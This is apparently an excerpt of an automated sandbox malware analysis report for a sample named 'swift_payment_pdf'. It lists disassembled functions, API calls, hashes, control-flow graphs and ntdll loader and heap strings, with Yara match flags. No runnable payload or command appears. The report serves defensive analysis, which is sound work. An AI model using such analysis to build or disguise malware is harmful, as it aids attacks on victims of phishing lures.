                  • Opcode ID: ecdf7e4bdfac5a167bbb19b0b9b4d889b177d5f5ebb8bc45ee1e268a5426d72b
                  • Instruction ID: fe1a1c65a48c08610a5e0cbdf53c3a506a747c0d4b892b8bc14a8e7852f46556
                  • Opcode Fuzzy Hash: ecdf7e4bdfac5a167bbb19b0b9b4d889b177d5f5ebb8bc45ee1e268a5426d72b
                  • Instruction Fuzzy Hash: 90011EB5E4020DABDF10DAE5DC42FDEB778AF54308F0041AAE90897241F679EB548B95
                  Function 0042B4F3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 211 42b4f3-42b52f call 4048c3 call 42c5a3 NtClose
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 91de5def3585cfe60dddf9ff454c7c0e50eace4dd2efa41be2c5c793dc76b1da
                  • Instruction ID: 90b815bc071492a453e27412e2fbed4d99da0b57eb660972553d2f8684f941e9
                  • Opcode Fuzzy Hash: 91de5def3585cfe60dddf9ff454c7c0e50eace4dd2efa41be2c5c793dc76b1da
                  • Instruction Fuzzy Hash: D0E0DF362002143BD610BA5ADC01F9B735CDBC4318F40802AFA08A7241CA70B90583F0
                  Function 01392B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: c6eca65387f8cbd2d3c2ecae69a11608095565f434516c40ee3437ed5c8a0c33
                  • Instruction ID: 54a94143255f7bc2a3254bdae96c69da31920ee960dee43c8729d1ec4aa2afd0
                  • Opcode Fuzzy Hash: c6eca65387f8cbd2d3c2ecae69a11608095565f434516c40ee3437ed5c8a0c33
                  • Instruction Fuzzy Hash: 249002A5702400039105719C4428616400AD7E0206B95C061E1014590DC52589956225
                  Function 01392DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: de84c5f1486a8744120141c62cd42a792421830de351d96922f841ea01fffa41
                  • Instruction ID: f193408a96201cc406d6266fe2dc7023656c9b259da8def7772700b1ec20108f
                  • Opcode Fuzzy Hash: de84c5f1486a8744120141c62cd42a792421830de351d96922f841ea01fffa41
                  • Instruction Fuzzy Hash: 9890027570140413E111719C45187070009D7D0246FD5C452A0424558DD6568A56A221
                  Function 01392C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: ff51e7a7a7f54927ac60b3b70d5913199a773f50f37a3c314737d6c173f49829
                  • Instruction ID: 715e9fe4aa3288be8eb4ff8cccbe8c5c67837b29eccb0878c366be8cdb5b50a0
                  • Opcode Fuzzy Hash: ff51e7a7a7f54927ac60b3b70d5913199a773f50f37a3c314737d6c173f49829
                  • Instruction Fuzzy Hash: 4090027570148802E110719C841874A0005D7D0306F99C451A4424658DC69589957221
                  Function 013935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 1d9cac39d44b0b58d2998c6013f9c15776d01e32050135424077ffa3ae8e5779
                  • Instruction ID: 9eb7ceefee369cdea40d228d93f8d639d43af6248c8c9af65430fdee15c0a0e2
                  • Opcode Fuzzy Hash: 1d9cac39d44b0b58d2998c6013f9c15776d01e32050135424077ffa3ae8e5779
                  • Instruction Fuzzy Hash: BA900275B0550402E100719C45287061005D7D0206FA5C451A0424568DC7958A5566A2
                  Function 00418530 Relevance: .2, Instructions: 169COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7099c8f25cd407527f910d51426f4d79fc15ff9128e3720b92457ffba401e8b7
                  • Instruction ID: 44e679aacca36e64ee984b103f5570765c9c5b8a865e123a45d468a3ccac6cba
                  • Opcode Fuzzy Hash: 7099c8f25cd407527f910d51426f4d79fc15ff9128e3720b92457ffba401e8b7
                  • Instruction Fuzzy Hash: 465192B1D0022A9BCB24DF65CC80AEEB778BF45344F1441AFE85967341DB389A81CF99
                  Function 00414008 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 414008-414021 1 414023-41402c 0->1 2 41407b-41407e 0->2 3 41402d-414036 1->3 4 414080-414086 2->4 5 414087-414095 2->5 7 413fe8-413feb 3->7 8 414038-414060 3->8 4->5 6 414104-41413d call 404833 call 424773 5->6 22 41415d-414163 6->22 23 41413f-41414e PostThreadMessageW 6->23 9 413fed-414006 7->9 10 413f6f 7->10 8->3 13 414062 8->13 9->0 14 413fb0-413fb7 9->14 10->9 16 413f71-413f9b 10->16 17 414064-414095 13->17 18 4140a6-4140ca 13->18 14->10 16->14 17->6 23->22 24 414150-41415a 23->24 24->22
                  APIs
                  • PostThreadMessageW.USER32(782yF2SJ,00000111,00000000,00000000), ref: 0041414A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 782yF2SJ$782yF2SJ
                  • API String ID: 1836367815-398769369
                  • Opcode ID: c7f29667ad39358e7cd95ada56fe57b13f7dace00910ff4a3d76bf9562137398
                  • Instruction ID: fd63b44af98025a72d4fa98da87434eef77412bb1821cb1c653e78d7f67e31b3
                  • Opcode Fuzzy Hash: c7f29667ad39358e7cd95ada56fe57b13f7dace00910ff4a3d76bf9562137398
                  • Instruction Fuzzy Hash: 4F31E171A09358EBC7115F648C804DABFB8EEA2764B6941AEE5905F302D736CD03C7D9
                  Function 0041404E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 25 41404e-414060 26 414062 25->26 27 41402d-414036 25->27 28 414064-414095 26->28 29 4140a6-4140ca 26->29 30 413fe8-413feb 27->30 31 414038-414048 27->31 32 414104-41413d call 404833 call 424773 28->32 33 413fed-414006 30->33 34 413f6f 30->34 31->25 47 41415d-414163 32->47 48 41413f-41414e PostThreadMessageW 32->48 36 413fb0-413fb7 33->36 37 414008-414021 33->37 34->33 38 413f71-413f9b 34->38 36->34 41 414023-41402c 37->41 42 41407b-41407e 37->42 38->36 41->27 44 414080-414086 42->44 45 414087-414095 42->45 44->45 45->32 48->47 49 414150-41415a 48->49 49->47
                  APIs
                  • PostThreadMessageW.USER32(782yF2SJ,00000111,00000000,00000000), ref: 0041414A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 782yF2SJ$782yF2SJ
                  • API String ID: 1836367815-398769369
                  • Opcode ID: a69e8e3017691d865094c5e9f9ec24c39915d7b64d7cb4ab19d8d76e1e3ced31
                  • Instruction ID: 7940f1e7ecdb3b4b62d6bcaa22b2ef08efc8c0b04b3bc30a61e8047227467ed5
                  • Opcode Fuzzy Hash: a69e8e3017691d865094c5e9f9ec24c39915d7b64d7cb4ab19d8d76e1e3ced31
                  • Instruction Fuzzy Hash: E521DF76D09288BFC7118B759C808EAFF7CEE8237475980DAFA549F300D2294D438795
                  Function 004140CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 50 4140cb-4140cd 51 414121-41413d 50->51 52 4140cf-414110 call 42d473 call 42de83 call 417a13 50->52 53 41415d-414163 51->53 54 41413f-41414e PostThreadMessageW 51->54 62 414117-41411c call 424773 52->62 63 414112 call 404833 52->63 54->53 56 414150-41415a 54->56 56->53 62->51 63->62
                  APIs
                  • PostThreadMessageW.USER32(782yF2SJ,00000111,00000000,00000000), ref: 0041414A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 782yF2SJ$782yF2SJ
                  • API String ID: 1836367815-398769369
                  • Opcode ID: 37ef010294f185b7eaa4f3932170b3ad4f66df1c4a9736597cc3d4c43601d7de
                  • Instruction ID: 27887e5d6d606f4d8a50c965d05f483e7359bf5fadb5b2518daee8e78d21bdfc
                  • Opcode Fuzzy Hash: 37ef010294f185b7eaa4f3932170b3ad4f66df1c4a9736597cc3d4c43601d7de
                  • Instruction Fuzzy Hash: 3711E571E0011C7ADB10AAE1DC82DEF7B7CDF92798F458069F914AB200D27C4F468BA5
                  Function 004140D3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 65 4140d3-4140e5 66 4140ed-414110 call 42de83 call 417a13 65->66 67 4140e8 call 42d473 65->67 72 414117-41413d call 424773 66->72 73 414112 call 404833 66->73 67->66 76 41415d-414163 72->76 77 41413f-41414e PostThreadMessageW 72->77 73->72 77->76 78 414150-41415a 77->78 78->76
                  APIs
                  • PostThreadMessageW.USER32(782yF2SJ,00000111,00000000,00000000), ref: 0041414A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID: 782yF2SJ$782yF2SJ
                  • API String ID: 1836367815-398769369
                  • Opcode ID: 3279c5cd0aa070fbb07c193420da9668867b824f06cefe7adbf17f7ea94db425
                  • Instruction ID: 818ec634e2ffde46fc68a71d5f25dc2ba303bf7b722c5a5ad980968e0392e15d
                  • Opcode Fuzzy Hash: 3279c5cd0aa070fbb07c193420da9668867b824f06cefe7adbf17f7ea94db425
                  • Instruction Fuzzy Hash: D801D6B2D0011C7AEB10AAE19C81DEFBB7CDF81798F458069FA14BB241D67C5E0687A5
                  Function 0042B863 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 206 42b863-42b8a4 call 4048c3 call 42c5a3 RtlFreeHeap
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,004172EF,000000F4,?,?,?,?,?), ref: 0042B89F
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction ID: 6f8d98db5c198f9e7a3657781cdc74daa3dcc8cfcdde988aefe177e73d539d1e
                  • Opcode Fuzzy Hash: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction Fuzzy Hash: 78E06DB62042147BC610EE9AEC41EDB37ACEFC8714F004419FA08A7281C670B91187B4
                  Function 0042B813 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 201 42b813-42b857 call 4048c3 call 42c5a3 RtlAllocateHeap
                  APIs
                  • RtlAllocateHeap.NTDLL(?,0041E1BB,?,?,00000000,?,0041E1BB,?,?,?), ref: 0042B852
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction ID: a1e968e79da1e829bde1a7e5805d4e29f8c5e82b974be208b3a30182389c6a92
                  • Opcode Fuzzy Hash: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction Fuzzy Hash: 79E06DBA2102147BD610EE59DC41F9B33ACEFC9714F404419F908A7242D770B91187B4
                  Function 0042B8B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 216 42b8b3-42b8ec call 4048c3 call 42c5a3 ExitProcess
                  APIs
                  • ExitProcess.KERNEL32(?,00000000,?,?,3837F854,?,?,3837F854), ref: 0042B8E7
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253099345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_swift_payment_pdf.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: dffac8ff790c42534f4bae447757f3b78d3e34d2b3211e786ff88b7579e921e6
                  • Instruction ID: 1b5485e0300e52dba76e5ea77d9eab010bff899a160bbf879fb636236d84a5f1
                  • Opcode Fuzzy Hash: dffac8ff790c42534f4bae447757f3b78d3e34d2b3211e786ff88b7579e921e6
                  • Instruction Fuzzy Hash: B0E04F762102147BC610BB9ADC41F9BB7ACDBC5714F80841AFA0867182C771B90187B4
                  Function 01392C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 221 1392c0a-1392c0f 222 1392c1f-1392c26 LdrInitializeThunk 221->222 223 1392c11-1392c18 221->223
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 5ce7ba760124a321ec70dcecae7d302cc463a48b341a6a694b30ff3fe13bd88b
                  • Instruction ID: 5395af78034d3f37a12e0fef1ddb81c430bc0ab77c9a0f02c67880c08a012418
                  • Opcode Fuzzy Hash: 5ce7ba760124a321ec70dcecae7d302cc463a48b341a6a694b30ff3fe13bd88b
                  • Instruction Fuzzy Hash: 5BB09B71D019C5D5EF11E7A4460C7177900B7D0705F55C061D2030651F4738D1D5E675

                  Non-executed Functions

                  Function 013D2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-2160512332
                  • Opcode ID: 641094d46b3d64ab10d152c92175cc28738deb9a82257e19cdd7fb5216ea730e
                  • Instruction ID: 9f8a06dafa9fd72c9029bb406c92d4922da0fbfc1cd18303bc8a6032cb12efbc
                  • Opcode Fuzzy Hash: 641094d46b3d64ab10d152c92175cc28738deb9a82257e19cdd7fb5216ea730e
                  • Instruction Fuzzy Hash: 2B928F72604342AFE721DF28D840B6BBBE8BF84758F04492DFA95D7251D770E844CB92
                  Function 01388620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                  Download Yara Rule
                  Strings
                  • Invalid debug info address of this critical section, xrefs: 013C54B6
                  • Critical section address, xrefs: 013C5425, 013C54BC, 013C5534
                  • Thread identifier, xrefs: 013C553A
                  • corrupted critical section, xrefs: 013C54C2
                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C54E2
                  • Thread is in a state in which it cannot own a critical section, xrefs: 013C5543
                  • Address of the debug info found in the active list., xrefs: 013C54AE, 013C54FA
                  • Critical section address., xrefs: 013C5502
                  • Critical section debug info address, xrefs: 013C541F, 013C552E
                  • double initialized or corrupted critical section, xrefs: 013C5508
                  • undeleted critical section in freed memory, xrefs: 013C542B
                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C54CE
                  • 8, xrefs: 013C52E3
                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013C540A, 013C5496, 013C5519
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                  • API String ID: 0-2368682639
                  • Opcode ID: c985f39605ffcc54ec943bd5dd69ef5f6eac0b0215641a4a8ca9e08daa66afa3
                  • Instruction ID: 6d8a907ff6724fe912dc5536d2f1aa7374ff53dacd1cecd25207c91fee0eea06
                  • Opcode Fuzzy Hash: c985f39605ffcc54ec943bd5dd69ef5f6eac0b0215641a4a8ca9e08daa66afa3
                  • Instruction Fuzzy Hash: 98819AB1A00358EFDB20CF99C841BAEBBB9BB48B28F10425DF505B7750D371A940CB54
                  Function 013829F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                  Download Yara Rule
                  Strings
                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 013C2624
                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013C24C0
                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 013C2498
                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 013C2506
                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013C25EB
                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 013C2412
                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 013C2602
                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013C22E4
                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 013C261F
                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 013C2409
                  • @, xrefs: 013C259B
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                  • API String ID: 0-4009184096
                  • Opcode ID: 38e3cc52612eb4ab68daf509759eac5c686293cf32eab3d21f92d199387494e1
                  • Instruction ID: 5505e4b41e1a6d3ecdcbc685ade527b20d0543048b31dd270731a8254a0188c3
                  • Opcode Fuzzy Hash: 38e3cc52612eb4ab68daf509759eac5c686293cf32eab3d21f92d199387494e1
                  • Instruction Fuzzy Hash: FE0250F5D002299FDF21DB58CC80BEAB7B8AF54718F0441DAE649A7241DB70AE84CF59
                  Function 013F8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                  • API String ID: 0-2515994595
                  • Opcode ID: 3bff28b8c2824d8bbd8ae8f90057966d3241bba182d376649013bd0c5ef34249
                  • Instruction ID: 3c10f28f7ed8a5b643bb6a77e9d75035299f32a7f7c63a8071f83fcf41a79f72
                  • Opcode Fuzzy Hash: 3bff28b8c2824d8bbd8ae8f90057966d3241bba182d376649013bd0c5ef34249
                  • Instruction Fuzzy Hash: 5351DE716053169BD729DF198844BABBBECFF94748F14496DFA98C3280E770D608CB92
                  Function 01400274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                  • API String ID: 0-1700792311
                  • Opcode ID: 5091eb0ec06ad2ecacb429eeb0ed7413793b2371357c70d535db404a9a4c1bc9
                  • Instruction ID: 2067a15501694986da4ef37cb5b0e59d64f8d32cd01d551e1cf33ae9acd17474
                  • Opcode Fuzzy Hash: 5091eb0ec06ad2ecacb429eeb0ed7413793b2371357c70d535db404a9a4c1bc9
                  • Instruction Fuzzy Hash: 88D1C135500685EFDB22DFAAC440BAABBF1FF5A754F08806AF4459B3A2C735E941CB14
                  Function 013D89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                  Download Yara Rule
                  Strings
                  • HandleTraces, xrefs: 013D8C8F
                  • VerifierDebug, xrefs: 013D8CA5
                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 013D8A67
                  • VerifierDlls, xrefs: 013D8CBD
                  • VerifierFlags, xrefs: 013D8C50
                  • AVRF: -*- final list of providers -*- , xrefs: 013D8B8F
                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 013D8A3D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                  • API String ID: 0-3223716464
                  • Opcode ID: 3660ba18a96f764ff7aa062137b974dd9d81a7f6db4bcd7c0899a02e04c29259
                  • Instruction ID: 80968dfd0f8d8dc1c4d7e0f2bd5d278536ac784ee4d87bf0d59e1dce759e4303
                  • Opcode Fuzzy Hash: 3660ba18a96f764ff7aa062137b974dd9d81a7f6db4bcd7c0899a02e04c29259
                  • Instruction Fuzzy Hash: E89125B3641716EFEB21EF6CE880B5AB7A8BB5561CF050499FA416F290C730BC01CB95
                  Function 0135EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                  • API String ID: 0-1109411897
                  • Opcode ID: 3cd6b1c57364d04dcd66e1b39506a450edcf2cc6c3ff91162c3eb75ab0215627
                  • Instruction ID: 6c36fa4d0a6db098ee3934c3d307f4e4a19d7d35a84a7bbff9a3c1626d3a57fd
                  • Opcode Fuzzy Hash: 3cd6b1c57364d04dcd66e1b39506a450edcf2cc6c3ff91162c3eb75ab0215627
                  • Instruction Fuzzy Hash: ABA26E74A056298FDF64CF18CC88BADBBB5AF45708F1442E9D90EA7651EB349E84CF04
                  Function 013863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                  • API String ID: 0-792281065
                  • Opcode ID: c7d48e67806fb394b69f6dd5fa9df7cb889ceed6a6cc9da5896fce5b37f3c3fd
                  • Instruction ID: cd89486a2d6481b4a6661878d16fb15e085e18b44ba02104b0759f0e7fc706a4
